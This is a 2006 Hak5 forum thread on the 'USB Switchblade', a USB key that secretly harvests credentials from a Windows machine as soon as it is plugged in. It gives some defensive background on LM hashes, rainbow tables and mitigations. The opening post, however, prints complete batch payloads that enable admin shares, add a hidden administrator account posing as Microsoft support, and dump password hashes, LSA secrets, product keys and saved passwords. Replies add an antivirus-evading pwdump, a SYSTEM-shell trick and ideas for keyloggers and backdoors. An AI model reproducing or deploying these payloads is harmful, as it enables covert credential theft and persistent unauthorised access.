Darren Kitchen Posted September 5, 2006 Share Posted September 5, 2006 From Hak5 episode 2x02, fourth segment: http://www.hak5.org/archives/138 Show notes: Most Current: http://www.hak5.org/wiki/index.php?title=E...itchblade.22.29 Wiki page: http://www.hak5.org/wiki/index.php?title=USB_Switchblade Show Notes 1.0 adapted from my CFH #437 notes: Instant USB Password Recovery Tool (The "USB Switchblade") *Further development for this project can be found on the Hak5 forums at http://www.hak5.org/forums/viewtopic.php?t=2361<br> In this segment we'll overview a few of Microsoft Window's security weaknesses and show how to build a custom USB key that will retrieve vital information from a target computer, necessary for auditing password strength. A major flaw in the way Windows stores password information is the use of the legacy LM, or LAN Manager hash. While this hash is based on DES encryption it is vulnerable to time-memory trade-off attacks due to it's poor implementation. Our custom USB key uses new U3 technology to automatically and invisibly retrieve these weak hashes within seconds of being inserted into the target computer. From here the LM hashes can be tested against a set of rainbow tables using the popular rainbowcrack software and audited for password strength. We will also cover password best practices and prevention methods for this type of attack. While the above paragraph may sound daunting at first I will break it down into human terms and explain how and why this works, and what you at can do to keep more secure passwords. Overview of weaknesses in Windows password stores The weakness that we will be exploiting is the way in which Windows stores password information. Since Windows 95 passwords have been stored in what is known as the LM, or LAN Manager hash. This hash is based on DES encryption which is a reasonably secure hash function, however the way in which Microsoft implemented it makes it easily attacked for a few reasons. First, the user's password is converted to all uppercase. Second the password is padded or truncated to 14 bytes. Next the password is split into two 7 byte halves and the values are used to create two DES keys with a constant ASCII string, resulting in two 8 byte values. Those two values are concatenated to form a 16 byte value, which is the LM hash. Basically what that all means is that your password is converted to all uppercase, split into two hashes, and stored in a DES encrypted hash. This makes the hash susceptible to brute force, or in our case, Time-Memory Trade-Off attacks, which we'll get into in a few moments. Overview of password auditing USB key The beauty of our custom password hash retrieving USB key comes from it's unique use of U3 technology. U3 is relatively new USB flash drive technology developed by U3 LLC in cooperation with Sandisk and M-Systems. More information about U3 can be found at the website http://www.u3.com It basically uses a portion of the flash drive's memory as a virtual CD-ROM drive. This allows the Windows autorun feature to work properly, enabling us to run programs as soon as the drive is inserted into a computer. The autorun feature does not work properly on standard USB flash drives so a U3 enabled USB flash drive is required to make this work. In this example we are using a U3 enabled SanDisk Cruzer Micro USB Flash Drive. This drive comes with U3 software enabling the use of applications like Skype directly from the flash drive. We will need to wipe out the U3 partition on this drive and replace it with our own payload. In this case we are using a payload developed by a Hak5 community member that goes by the name of MaxDamage. Max's payload contains a visual basic script and autorun.inf file which will be flashed onto the U3 CD-ROM partition. The autorun.inf file launches the visual basic script, which in turn runs the exploit located on the normal flash drive partition invisibly. To replace the existing U3 software on the U3 enabled SanDisk Cruizer Micro USB Flash Drive we will need two files. The LPInstaller.exe and the cruzer-autorun.iso file. Both are hosted on the www.hak5.org website and is under further development on our forums and wiki. The LPInstaller.exe is a piece of software developed by Sandisk for updating the U3 software on the flash drive. By default it will query a special website at Sandisk, download the latest U3 software, and flash the U3 partition on the USB flash drive. Since we want to install our own software we simple need to place a file named cruzer-autorun.iso in the same directory as the LPInstaller.exe program and run it. This will replace the existing U3 software with the first part of our payload. The second part of Max's payload are the scripts located on the normal partition of the USB flash drive. These are located within the hidden folders WIP/CMD/ and include dlls, visual basic scripts, and executables, all run from a batch file. The batch file, go.cmd, will be run invisibly upon drive insertion and run the various password hash recovery tools. The most important part of this toolkit is the PwDump tool which will retrieve the LM hashes from the local computer and save them to a log file on the normal flash drive partition within the /Documents/logfiles directory, with a file name based on the computer name with a .log extension. This file is created by the go.cmd file invisibly upon insertion and contains the LM hashes, as well as many other pieces of information. Further clarification on instalation procedures for the password hash retrieving USB key can be found on the hak5.org website. Overview of Time-Memory Trade-Off Time-Memory Trade-Off, or TMTO, in terms of password cracking is a procedure used to reduce the amount of computation time needed to test hashes, normally using a lookup table. The password cracking is done by comparing the password hash, in our case the LM hash, against a table of hashes and their known plaintext equivalents. The most popular table for this type of password cracking are known as Rainbow Tables, used in conjunction with a tool called Rainbow Crack. A full explanation of Time-Memory Trade-Off and Rainbow Tables are out of the scope of this article so I encourage you to read the following articles if interested: http://neworder.box.sk/newsread.php?newsid=13362 http://www.antsight.com/zsl/rainbowcrack/ http://en.wikipedia.org/wiki/Rainbow_table There are many online services for comparing LM hashes against lookup tables, such as www.plain-text.info, www.md5lookup.com, and www.rainbowcrack-online.com. However in this example we will be using our own rainbow tables with the rainbow crack tool. One of the best places to obtain a set of rainbow tables is the website http://rainbowtables.shmoo.com/ operated by the Schmoo group. We will also need the rainbow crack software available from http://www.antsight.com/zsl/rainbowcrack/ Putting the tools to use Once you have gathered the necessary tools and created your own password hash retrieving USB key using a compatible U3 enabled USB Flash Drive we can put it to use and audit our computer's password strength. The first step is to insert the USB flash drive into a Windows computer and wait a few seconds for it to be recognized. Once recognized the payload should be run automatically and invisibly, creating a log file on the flash drive in the /documents/logfiles/ directory. From here our work is done and we can safely remove the USB flash drive. From this or another computer we can open the log file containing the LM hash and run it against our rainbow tables using the rainbow crack tool. To do so we will copy the LM hash of the user's password we wish to audit from the log file into a new file named pwfile.txt and move it to the directory where we store our rainbow tables and rainbow crack tool. The command to test the hash against the tables is "rcrack *.rt -f pwfile" The rainbow crack tool will then take a few minutes to run the LM hash against our rainbow tables and display the results. If we see the password in plaintext we know that the password is weak and needs to be strengthened. Mitigation There are a few things that need to be explained about this method for password hash retrieval and cracking. First is that physical access is needed to the Windows computer for which we will be testing. Second is that the computer is logged in with administrative access. And third is that no anti-virus that would detect the payload is running. In our tests Symantec Corporate Anti-Virus was able to detect the pwdump tool in the payload and prevent it from running. Many other anti-virus solutions may do the same. Now if we are successful in using this method to retrieve the LM hash and run it against our rainbow tables and find a match the next step is to strengthen the password. To do this we must understand the limitations of the LM hash. While the LM hash may be Window's akilies heal it can easily be circumvented by two methods. First is to use a password of 15 characters or higher, which is highly recommended. For further reading on long password best practices see the following websites on pass phrases: http://www.microsoft.com/technet/community...gmt/sm1104.mspx http://www.fourmilab.ch/javascrypt/pass_phrase.html It is also worth mentioning that LM hashes can be disabled entirely on a Windows 2000 or higher computer by making a simple change to the registry. For more information on preventing Windows from storing a LM hash see the following article in the Microsoft Knowledge Base: http://support.microsoft.com/kb/299656/ As an added precaution we can also disable the Windows autorun feature. More information on that procedure can be found in this Microsoft Knowledge Base article: http://support.microsoft.com/kb/q155217 For more information on any of these topics and the MaxDamage password hash retrieving payload visit the wiki at www.hak5.org/wiki/ Related Links http://www.hak5.org http://www.u3.com http://neworder.box.sk/newsread.php?newsid=13362 http://www.antsight.com/zsl/rainbowcrack/ http://en.wikipedia.org/wiki/Rainbow_table http://www.microsoft.com/technet/community...gmt/sm1104.mspx http://www.fourmilab.ch/javascrypt/pass_phrase.html http://support.microsoft.com/kb/299656/ http://support.microsoft.com/kb/q155217 Credits: MaxDamage Amish Thinking out loud Feel free to use the wiki for development. Possibly filed under Hak5 Labs or something. Could be a good place for the pandora hack and future projects. Requirements *physical Access*usb port *autorun enabled *no anti-virus (might be able to fix this) *administrator privledges (might be able to automate system level escalation) MaxDamage's Solution 1. LoaderThis replaces the U3 partition on the Sandisk Cruizer Micro with an invisible autorun loader http://www.hak5.org/releases/2x02/switchbl...D1.0-loader.rar 2a. Payload 1.0 This payload gathers IP information, enables admin shares, adds an admin account, dumps the SAM, product keys, URL history, and LSA secrets http://www.hak5.org/releases/2x02/switchbl...1.0-payload.rar @echo off @if not exist Documents md Documents >nul @if not exist Documentslogfiles md Documentslogfiles >nul @echo ==================================================[Passive query bit] > Documentslogfiles%computername%_load.log 2>&1 @echo ==================================================[System info] >> Documentslogfiles%computername%_load.log 2>&1 @echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> Documentslogfiles%computername%_load.log 2>&1 @ipconfig /all >> Documentslogfiles%computername%_load.log 2>&1 @echo ==================================================[END System info] >> Documentslogfiles%computername%_load.log 2>&1 @echo ==================================================[Enabling Admin Shares] >> Documentslogfiles%computername%_load.log 2>&1 @reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters /v @AutoSharewks /t reg_dword /d 1 /f >> Documentslogfiles%computername%_load.log 2>&1 @echo ==================================================[END Enabling Admin Shares] >> Documentslogfiles%computername%_load.log 2>&1 @echo ==================================================[Add an administrative User Account] >> Documentslogfiles%computername%_load.log 2>&1 @net user /add SUPPORT_388945a1 inferno /fullname:"Microsoft Corporation Help Request" >> Documentslogfiles%computername%_load.log 2>&1 @net localgroup Administrators SUPPORT_388945a1 /add >> Documentslogfiles%computername%_load.log 2>&1 @echo MYUSER: SUPPORT_388945a1 Password: inferno >> Documentslogfiles%computername%_load.log 2>&1 @reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v SUPPORT_388945a1 /t reg_dword /d 0 /f >> Documentslogfiles%computername%_load.log 2>&1 @echo ==================================================[END Add User] >> Documentslogfiles%computername%_load.log 2>&1 @echo ==================================================[Dump SAM] >> Documentslogfiles%computername%_load.log 2>&1 @.pwdump 127.0.0.1 >> Documentslogfiles%computername%_load.log 2>&1 @echo ==================================================[Dump END SAM] >> Documentslogfiles%computername%_load.log 2>&1 @echo ==================================================[Dump Product Keys] >> Documentslogfiles%computername%_load.log 2>&1 @.produkey /nosavereg /stext "Documentslogfiles%computername%_zzz.txt" /remote %computername% >> Documentslogfiles%computername%_load.log 2>&1 @copy Documentslogfiles%computername%* Documentslogfiles%computername%_load.log >> nul @del /f /q "Documentslogfiles%computername%_zzz.txt" @echo ==================================================[Dump Product Keys END] >> Documentslogfiles%computername%_load.log 2>&1 @echo ==================================================[Dump URL History] >> Documentslogfiles%computername%_load.log 2>&1 @cscript //nologo .DUH.vbs >> Documentslogfiles%computername%_load.log 2>&1 @echo ==================================================[Dump URL History] >> Documentslogfiles%computername%_load.log 2>&1 @echo ==================================================[Dump LSA Secrets] >> Documentslogfiles%computername%_load.log 2>&1 @.pspv.exe /stext "Documentslogfiles%computername%_LSA.log" >> Documentslogfiles%computername%_load.log 2>&1 @copy Documentslogfiles%computername%* Documentslogfiles%computername%_load.log >> nul @del /f /q "Documentslogfiles%computername%_LSA.log" @echo ==================================================[Dump END LSA] >> Documentslogfiles%computername%_load.log 2>&1 :End @exit 2b. Payload 1.1 This payload gathers IP information, dumps SAM, product keys, LSA secrets, network passwords, messenger passwords, and URL history. http://www.hak5.org/releases/2x02/switchbl...1.1-payload.rar @echo off if not exist Documents md Documents >nul if not exist Documentslogfiles md Documentslogfiles >nul cd wipcmd >nul Echo ************************************ > Documentslogfiles%computername%.log 2>&1 echo ***********[System info]************ >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> Documentslogfiles%computername%.log 2>&1 ipconfig /all >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 echo ***********[Dump SAM]*************** >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 .pwdump 127.0.0.1 >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 echo ***********[Dump Product Keys]****** >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 .produkey /nosavereg /stext "Documentslogfiles%computername%_pk.log" /remote %computername% >> Documentslogfiles%computername%.log 2>&1 copy Documentslogfiles%computername%.log+Documentslogfiles%computername%_pk.log* Documentslogfiles%computername%.log >> nul del /f /q "Documentslogfiles%computername%_pk.log" >nul Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 echo ***********[Dump LSA secrets]******* >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 .pspv.exe /stext "Documentslogfiles%computername%_LSA.log" >> Documentslogfiles%computername%.log 2>&1 copy Documentslogfiles%computername%.log+Documentslogfiles%computername%_lsa.log* Documentslogfiles%computername%.log >> nul del /f /q "Documentslogfiles%computername%_lsa.log" >nul Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 echo ***********[Dump Network PW]******** >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 .netpass.exe /stext "Documentslogfiles%computername%_np.log" >> Documentslogfiles%computername%.log 2>&1 copy Documentslogfiles%computername%.log+Documentslogfiles%computername%_np.log* Documentslogfiles%computername%.log >> nul del /f /q "Documentslogfiles%computername%_np.log" >nul Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 echo ***********[Dump messenger PW]******** >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 .mspass.exe /stext "Documentslogfiles%computername%_ms.log" >> Documentslogfiles%computername%.log 2>&1 copy Documentslogfiles%computername%.log+Documentslogfiles%computername%_ms.log* Documentslogfiles%computername%.log >> nul del /f /q "Documentslogfiles%computername%_ms.log" >nul Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 echo ***********[Dump URL History]******* >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 cscript //nologo .DUH.vbs >> Documentslogfiles%computername%.log 2>&1 :End exit 2c. Payload 1.2 (Pwdump update from BrainKill) http://www.hak5.org/releases/2x02/switchbl...1.2-payload.rar Updates either package with a version of Pwdump that is not detected by Symantec Anti-Virus. Amish's Solution Amish's solution is similar to MaxDamage's, however it does not require a U3 compatible USB drive. It relies on a little social engineering and gathers similar data. I'll let Amish explain it in more detail.http://www.hak5.org/releases/2x02/switchbl...1.0-payload.rar Quote Link to comment Share on other sites More sharing options...
brainkill Posted September 5, 2006 Share Posted September 5, 2006 Ok, so id like to know what executables are detectable as viruses. pwdump is... I plan to fix that right now. PM me on irc if you have a better idea. nick == Brainkill ===================== Quote Link to comment Share on other sites More sharing options...
cooper Posted September 5, 2006 Share Posted September 5, 2006 About the password stealing thing. It might be a good idea to try to copy over the Windows SAM file, its password database. Since the assumption is that you're already logged on as admin, chances are you can just copy the file. That's <your_windows_install_dir>system32configsam by default. Also, when you create a rescue disk, the sam file is typically copied along aswell, so if you can't get the real sam file, the one on the rescue disk might still contain valid passwords, or simply give you an idea about the passwords the various users on the system are prone to using. The rescue disk files are located in <your_windows_install_dir>repair My main question about this USB key is if it will work when the system is running a screensaver, or if it's locked but essentially logged on by the admin user? Quote Link to comment Share on other sites More sharing options...
brainkill Posted September 5, 2006 Share Posted September 5, 2006 Ok, so id like to know what executables are detectable as viruses. pwdump is... I plan to fix that right now. PM me on irc if you have a better idea. nick == Brainkill===================== pwdump and its dependencies can be encrypted. Ill post links below to the programs. Standard Disclaimers Apply! http://www.brainkill.net/hack/pwdump.exe http://www.brainkill.net/hack/pwservice.exe http://www.brainkill.net/hack/LsaExt.dll ======================= Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted September 5, 2006 Author Share Posted September 5, 2006 Ok, so id like to know what executables are detectable as viruses. pwdump is... I plan to fix that right now. PM me on irc if you have a better idea. nick == Brainkill===================== pwdump and its dependencies can be encrypted. Ill post links below to the programs. Standard Disclaimers Apply! http://www.brainkill.net/hack/pwdump.exe http://www.brainkill.net/hack/pwservice.exe http://www.brainkill.net/hack/LsaExt.dll ======================= I can verify that the latest version of symantec anti-virus corporate edition with the latest updates does not detect this now. score one for brainkill! Quote Link to comment Share on other sites More sharing options...
sars960 Posted September 5, 2006 Share Posted September 5, 2006 I've been watching Hack.5 for a while now but it's my first post. i've downloaded amish's version of the USB password recovery tool, but can't seem to figure out how to install and run properly. I'm not very good at this kind of stuff, but i'm looking for some detailed instructions (if it's not too much to ask) thanks! Quote Link to comment Share on other sites More sharing options...
sars960 Posted September 5, 2006 Share Posted September 5, 2006 within seconds after posting, i've checked digg, and guess what, you've been dugg! Quote Link to comment Share on other sites More sharing options...
Duelus Posted September 5, 2006 Share Posted September 5, 2006 As for not being able to run this without admin, here is my little contribution, it allows you to login as SYSTEM, after running the script, cmd.exe will show, run explorer, and there you go I hope someone can expand on it. Code of admin.bat : TASKKILL /F /IM "explorer.exe" sc create testsvc binpath= "cmd /K start" type= own type= interact sc start testsvc del admin.bat Quote Link to comment Share on other sites More sharing options...
spektormax Posted September 5, 2006 Share Posted September 5, 2006 brainkill did you use that fun little packer? Quote Link to comment Share on other sites More sharing options...
Sparda Posted September 5, 2006 Share Posted September 5, 2006 As for not being able to run this without admin, here is my little contribution, it allows you to login as SYSTEM, after running the script, cmd.exe will show, run explorer, and there you go I hope someone can expand on it.Code of admin.bat : TASKKILL /F /IM "explorer.exe" sc create testsvc binpath= "cmd /K start" type= own type= interact sc start testsvc del admin.bat That will only work using an admin acount... limited user acounts cannot create services... sorry if that felt like a kick in the balls :/ Quote Link to comment Share on other sites More sharing options...
spektormax Posted September 6, 2006 Share Posted September 6, 2006 haha well in our school, we have basicly admin, teacher, and student. Teacher is limited account, and student is a limited with no privlages. You can do a net user /add username password to get a teacher accoutn (its not admin but its closer) Quote Link to comment Share on other sites More sharing options...
dyna Posted September 6, 2006 Share Posted September 6, 2006 with Amish's do you need a U3 flash drive or not. I cant seem to get this to work on my cruiser mini(doesn't have U3) can any1 help me out? Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted September 6, 2006 Author Share Posted September 6, 2006 Amish's technique does not require a U3 drive. I've tested it and had it work just fine. I'm too exhausted right now to check. Amish: could you take a look and maybe explain your technique here? Thx, D Quote Link to comment Share on other sites More sharing options...
oomonkey Posted September 6, 2006 Share Posted September 6, 2006 i have a U3 4gb stick and i was trying tp use this technique, but i keep getting this error "0x00e70064 reference memory at 0x00e70064 . memory could not be written" this instance causes me to shut down and happens on my pc and laptop thoughts>? Quote Link to comment Share on other sites More sharing options...
Vext Posted September 6, 2006 Share Posted September 6, 2006 Hello, Are there any loaders out that can load this software on a Memorex drive? I have the Memorex Mini Traveldrive U3 and can't seem to find a loader for it. Thanks, Vext Quote Link to comment Share on other sites More sharing options...
sentinel Posted September 6, 2006 Share Posted September 6, 2006 I haven't tried the other ones, but I noticed there's a problem with the paths in Amish's version. If you go in to all of the batch files and change all instances of the following in all of the batch files it works. "batexe" to "" (nothing) "nircmd.exe" to "..nircmd.exe" "dump" to "..Dump" I think that's everything. This reminds me of the program creddump, which does some similar stuff but not as detailed and only to a text file. Quote Link to comment Share on other sites More sharing options...
aznrocket Posted September 6, 2006 Share Posted September 6, 2006 huh, just curious how difficult it would be to add a feature to this switchblade-- the capacity to copy files OFF of the computer you plug it into (e.g. documents, msn messenger logs, etc), while maintaining its stealthiness. Quote Link to comment Share on other sites More sharing options...
xyber411 Posted September 6, 2006 Share Posted September 6, 2006 ok, here's a thought: all this on an ipod... now that's the way to be stealthy... you're just trying to listen to your music on the computer... :) and with that, comes a lot of other things you can do as well... like possibly load multiple fake disks? tell me if it's possible to do all this stuff with it? : 1. record lm hashes (obviously) 2. install backdoor (like ultravnc) 3. install a smart keylogger 4. disable firewalls/Upnp tunnel through them 5. disable antivirus/antispyware 6. install folding@home & attach to a group 7. record email, .xls, .qdb, .mny, .doc, .qdf, .eml, & .jpg from computer and to top it all off, make a user interface to turn on and off each of the features within the install, so that you do not have to harm a computer if you do not want to. I think it would be possible, and even almost easy, seeing as all the software is already available... it's just a matter of stitching it all together in a way that works with almost every computer out there... oh, and most companies without an entire division dedicated to IT don't have administrator passwords... quite frankly, they mostly (at least in houston, tx) ask you not to password anything administrator, in hopes that they can switch outsourcing companies later on if need be. I agree with all of you that that's a bad practice, but hey, the customer gets what the customer wants, right? lol heh, I think i just came up with the iblade Quote Link to comment Share on other sites More sharing options...
Inkyskin_UK Posted September 6, 2006 Share Posted September 6, 2006 A while back I wrote a small app that keylogs and takes screenshots every 30 or so seconds in C#, and then mails them once they have reached a certain size if there is net access. It doesnt need installing, just added to the startup registry once copied to the target PC. That can be done with a tiny app very easily too, if auto run from something. You rekon that might be possible with this hack? Quote Link to comment Share on other sites More sharing options...
amish Posted September 6, 2006 Share Posted September 6, 2006 Stupid website had to create an account jsut to write this message. Right so yes my soloution does NOT need U3 technology, basically you should jsut unzip it to the root of your memory stick and it shoudl work correctly. I made ths just for my use mainly, but i sent it to darren, and he showed it. I think a quick fix was provided, but I will all more features to it in later dates, so yeah. Basically the file runs a batch script that creates a folder called the computername in the dump folder. In there it saves the different types of files. history and stuff. You can get more programs that you can put into the script from www.nirsoft.net Thats it ~Amish Sorry for the shabby coding ill update it soon, I really need to update it because school is starting :) *EDIT* I just tested the rar form the links darren gave and it works fine on my memory stick. its dumping the files just fine. Quote Link to comment Share on other sites More sharing options...
DLSS Posted September 6, 2006 Share Posted September 6, 2006 avast dont like it :( and wiggs out Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted September 6, 2006 Author Share Posted September 6, 2006 huh, just curious how difficult it would be to add a feature to this switchblade-- the capacity to copy files OFF of the computer you plug it into (e.g. documents, msn messenger logs, etc), while maintaining its stealthiness. It wouldn't be hard to program in, but I rather like it the way it is since it's actually way more stealthy. As a systems administrator if I found that this happened on my network I could check traffic logs and possibly find the drop site that the cracker used. Quote Link to comment Share on other sites More sharing options...
vehlewa1 Posted September 6, 2006 Share Posted September 6, 2006 Great tool, but I'm getting errors on the DUMP SAM portion: Logon to 127.0.0.1ADMIN$ failed: code 53 Or Logon to 127.0.0.1ADMIN$ failed: code 1231 Anyone else having similar problems? Quote Link to comment Share on other sites More sharing options...
Sparda Posted September 6, 2006 Share Posted September 6, 2006 That could be casued by a firewall or windows file sharing been disabled, I'm not familier with the error coads and so can't say for sure. Quote Link to comment Share on other sites More sharing options...
vehlewa1 Posted September 6, 2006 Share Posted September 6, 2006 File Sharing is enabled, and even with the firewall and anti-virus turned off I'm still getting the same errors. It seems to work great pulling all of my passwords from applications, but it wont even generate the hash to run against rainbow.. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.